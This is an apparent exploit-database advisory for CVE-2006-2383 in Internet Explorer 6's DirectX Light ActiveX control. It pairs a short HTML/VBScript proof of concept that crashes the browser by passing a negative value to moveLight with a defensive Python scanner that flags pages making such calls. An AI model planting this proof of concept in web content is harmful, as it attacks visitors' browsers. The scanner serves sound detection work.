Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution



EKU-ID: 33237
CVE: CVE-2006-2383; OSVDB-26444
Author: Will Dormann
Published: 2006-06-13
Verified: Verified


source: https://www.securityfocus.com/bid/18303/info

The DXImageTransform.Microsoft.Light ActiveX control is prone to a remote code execution vulnerability.

An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.

<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll

Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)

Description:
Sub moveLight (
 	ByVal lightNum  As Long ,
 	ByVal x  As Long ,
 	ByVal y  As Long ,
 	ByVal z  As Long ,
 	ByVal fAbsolute  As Long
)
Supplying negative parameters throws an access violation.
-->

<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
	Unable to create object
</object>

<script language="vbscript">
	Sub go
		DXTLight.moveLight "-1", "1", "1", "1", "1"
	End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">
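For defenders screening stored or proxied HTML, the following is an added example (not part of the original advisory or PoC) of a static check for pages that instantiate this CLSID and call moveLight with a negative literal argument. The function names and the sample string are assumptions constructed for illustration; the CLSID and parameter order come from the PoC above.

```python
import re

# CLSID taken from the <object> tag in the PoC above.
LIGHT_CLSID = "F9EFBEC2-4302-11D2-952A-00C04FA34F05"
# Parameter order from the moveLight signature quoted in the PoC comment.
PARAMS = ("lightNum", "x", "y", "z", "fAbsolute")

OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(classid|id)\s*=\s*["']?([^"'\s>]+)""", re.I)
LITERAL_RE = re.compile(r"""^["']?\s*(-?\d+)\s*["']?$""")

# Constructed sample input that mirrors the structure of the PoC on this page.
SAMPLE = """<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight"></object>
<script language="vbscript">
DXTLight.moveLight "-1", "1", "1", "1", "1"
</script>"""


def light_object_ids(html):
    """Return the id of every <object> tag that instantiates the Light control."""
    ids = []
    for tag in OBJECT_RE.findall(html):
        attrs = {name.lower(): value for name, value in ATTR_RE.findall(tag)}
        if attrs.get("classid", "").lower() == "clsid:" + LIGHT_CLSID.lower() and "id" in attrs:
            ids.append(attrs["id"])
    return ids


def negative_movelight_calls(html):
    """Return (object_id, [negative parameter names]) for each flagged call."""
    findings = []
    for obj_id in light_object_ids(html):
        # Matches both `obj.moveLight a, b` and `Call obj.moveLight(a, b)` forms.
        call_re = re.compile(
            r"\b" + re.escape(obj_id) + r"\.moveLight\b[ \t]*\(?([^\r\n)]*)", re.I)
        for raw_args in call_re.findall(html):
            negative = []
            for name, arg in zip(PARAMS, raw_args.split(",")):
                m = LITERAL_RE.match(arg.strip())
                if m and int(m.group(1)) < 0:
                    negative.append(name)
            if negative:
                findings.append((obj_id, negative))
    return findings


if __name__ == "__main__":
    print(negative_movelight_calls(SAMPLE))
```

The check only sees literal integer arguments; values passed through variables or computed at run time are not flagged, so treat any use of this CLSID in untrusted content as worth review.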